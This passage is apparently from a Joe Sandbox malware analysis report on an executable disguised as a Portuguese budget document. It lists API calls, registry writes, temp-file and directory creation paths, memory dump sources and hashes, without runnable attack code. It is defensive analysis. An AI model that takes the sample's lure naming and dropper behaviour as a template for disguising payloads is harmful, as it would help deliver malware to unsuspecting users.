                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc$CloseHandleLibrarylstrcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3864083275-3916222277
                                                                                                                                                                                                                          • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 869 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 876 4023c7-4023cf 869->876 877 402a4c-402a5b 869->877 878 4023d1-4023de call 402bbf lstrlenW 876->878 879 4023e2-4023e5 876->879 878->879 882 4023f5-4023f8 879->882 883 4023e7-4023f4 call 402ba2 879->883 887 402409-40241d RegSetValueExW 882->887 888 4023fa-402404 call 403027 882->888 883->882 891 402422-4024fc RegCloseKey 887->891 892 40241f 887->892 888->887 891->877 894 40281e-402825 891->894 892->891 894->877
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswC001.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswC001.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswC001.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nswC001.tmp
                                                                                                                                                                                                                          • API String ID: 1356686001-2034789380
                                                                                                                                                                                                                          • Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                                                                                                          • Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 895 405c54-405c60 896 405c61-405c95 GetTickCount GetTempFileNameW 895->896 897 405ca4-405ca6 896->897 898 405c97-405c99 896->898 900 405c9e-405ca1 897->900 898->896 899 405c9b 898->899 899->900
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405C72
                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe", xrefs: 00405C54
                                                                                                                                                                                                                          • nsa, xrefs: 00405C61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-1168270504
                                                                                                                                                                                                                          • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                                                                                                          • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                          • String ID: `OC
                                                                                                                                                                                                                          • API String ID: 334405425-799166930
                                                                                                                                                                                                                          • Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                                                                                                          • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F47
                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F68
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F8B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                                                                                                                                          • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                                                                          • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50, 4Sv,?,C:\Users\user\AppData\Local\Temp\,00405861,?,76533420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                                                                                                                                                            • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                                                                                                            • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty,?,00000000,000000F0), ref: 00401645
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty, xrefs: 00401638
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty
                                                                                                                                                                                                                          • API String ID: 1892508949-3039840383
                                                                                                                                                                                                                          • Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                                                                                          • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405152
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                                                                                                                                                                                            • Part of subcall function 00404160: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00404172
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                          • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                                                                                                          • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(005CC368), ref: 00401BA7
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BB9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                                                                                                          • Opcode ID: e6a2c73912112ff71fc33628da0d13833a7b58db45f4bb66cc56c7521ba72712
                                                                                                                                                                                                                          • Instruction ID: 7a614025040163c027adcf1a42aafa75fa428ef26c0d2b57b4045ab01fe90682
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6a2c73912112ff71fc33628da0d13833a7b58db45f4bb66cc56c7521ba72712
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66219072A40100EBDB20EFA4CE85E5F77AAAF45324B25453BF106B32D1DA78A8518B5D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalSize.KERNEL32(00000000), ref: 100010AA
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 100010B9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100010D6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26299321019.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299286823.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299354643.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26299386915.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_10000000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFreeSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 465308736-0
                                                                                                                                                                                                                          • Opcode ID: 5aa5a656087daa40f777e4f1ed1206b7320d07011ea3681182fea69699b670d0
                                                                                                                                                                                                                          • Instruction ID: f516a1bc6a14b8156c531ece61ee701a379590ab2ffb65a9b287619e966faa5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa5a656087daa40f777e4f1ed1206b7320d07011ea3681182fea69699b670d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B012476800711A7F711EBB5AC859CB77ECEF882E07018026FA08C720AEFB0E9404B61
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000003CA,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nswC001.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
